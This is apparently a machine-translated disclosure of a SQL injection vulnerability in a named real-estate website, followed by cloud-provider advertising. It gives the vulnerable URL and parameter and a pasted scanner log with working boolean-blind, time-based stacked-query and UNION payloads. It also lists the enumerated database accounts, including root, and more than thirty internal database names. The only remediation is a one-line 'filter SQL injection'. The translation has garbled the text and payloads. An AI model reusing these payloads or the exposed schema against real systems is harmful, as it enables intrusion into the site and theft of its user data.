Anjuke SQL injection vulnerability root permission massive user data
Overseas real estate-58 anjuke.com link: http://haiwai.anjuke.com Vulnerability URL: http://haiwai.anjuke.com /List/s? G = 6 database-version: MySQL> 5.0.11 vulnerability: g User: 'Active _ user' @ '%' aifang '@' % 'dbadmin' @' % 'deploy _ rx' @ '% ''job _ heartbeat' @ '% ''monitor '@' % ''readonly _ v2' @ '%' 'repl' @ '%' root '@ 'localhost' Database Name: u'activecollab ', u'aifang _ adm', u'aifang _ bbs ', u'aifang _ callcenter', u'aifang _ dw ', u'aifang _ inform_dw ', u'aifang _ Labs', u'aifang _ log', u'aifang _ message_db ', u'aifang _ monitor_db', u'aifang _ trip ', u'aifangcrm _ db', u'aifanguser _ db', u'm M _ dw ', u'fenxiao _ db', u'heartbeat _ db ', u 'ifstats _ db', u 'ifx _ db', u 'igivetest _ db', u 'info _ db', u 'information _ scheme ', u'mogilefs _ xinfang ', u'mysql', u'newploy _ db', u'newhome _ db', u'open _ db', u'percona ', u'performance _ scheme', u'scheduler _ db', u'test' detailed Detection Log: [{u'status': 1, u'type': 0, u'value': [{u'dbms ': u'mysql', u'suffix': U' -- [RANDSTR] ', u'clause': [1], u'ptype ': 1, u'dbms _ version': [U'> 5.0.11'], u'prefix': u'', u'place ': u'get', u'data': {u'1': {u'comment': u'', u'matchratio ': 0.582, u'title ': u' AND boolean-based blind-WHERE or HAVING clause ', u'templatepayload': None, u'vector': U' AND [INFERENCE] ', u'where ': 1, u 'payload': u 'G = 6 AND 6678 = 6678 -- khen'}, u '4': {u 'comment': U '#', u'matchratio ': 0.582, u'title': u'mysql> 5.0.11 stacked queries (SELECT-comment)', u'templatepayload': None, u 'vector ': u'; (SELECT * FROM (SELECT (SLEEP ([SLEEPTIME]-(IF ([INFERENCE], 0, [SLEEPTIME]) [RANDSTR]) ', u 'where': 1, u 'payload': u 'g = 6; (SELECT * FROM (SELECT (SLEEP ([SLEEPTIME]) CKHZ )#'}, u'6': {u'comment': U' ---', u'matchratio': 0.582, u'title': u'generic UNION query (NULL) -1 to 20 columns ', u'templatepayload': None, u'vector': [0, 1, U' ---', u '', u' -- [RANDSTR] ', u 'null', 1, True, False], u 'where': 1, u 'payload ': u 'G = 6 union all select concat (0x7171716271, clerk, 0x71786a6271) ---'}, u 'conf': {u 'string': None, u'notstring': None, u'titles ': False, u'regexp': None, u'textly': False, u'optimize ': False }, u'parameter ': u 'G', u' OS': None}]}, {u 'status': 1, u'type': 7, u'value ': [u "'Active _ user' @ '%'", u "'afang '@' % '", u "'dbadmin' @' % '", u "'ploy _ rx '@' % '", u "'job _ heartbeat' @ '%'", u "'monitor' @ '% '", u "'readonly _ v2' @ '%'", u "'repl' @ '%'", u "'root' @ 'localhost'"]}, {u'status': 1, u'type': 11, u'value': [u'activecollab ', u'aifang _ adm', u'aifang _ bbs ', u 'aifang _ callcenter', u 'aifang _ dw ', u 'aifang _ inform_dw', u 'aifang _ Labs', u 'aifang _ log ', u 'aifang _ message_db ', u 'aifang _ monitor_db', u 'aifang _ trip ', u 'aifangcrm _ db', u 'aifanguser _ db ', u'm M _ dw ', u'fenxiao _ db', u'heartbeat _ db', u'ifstats _ db', u'ifx _ db ', u'igivetest _ db', u'info _ db', u'information _ scheme', u'mogilefs _ xinfang ', u'mysql', u'newdeploy _ db ', u'newhome _ db', u'open _ db', u'percona ', u'performance _ scheme', u'scheduler _ db', u'test']}, {'detectstatus': True}]
Vulnerability repair solution: Filter SQL Injection
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
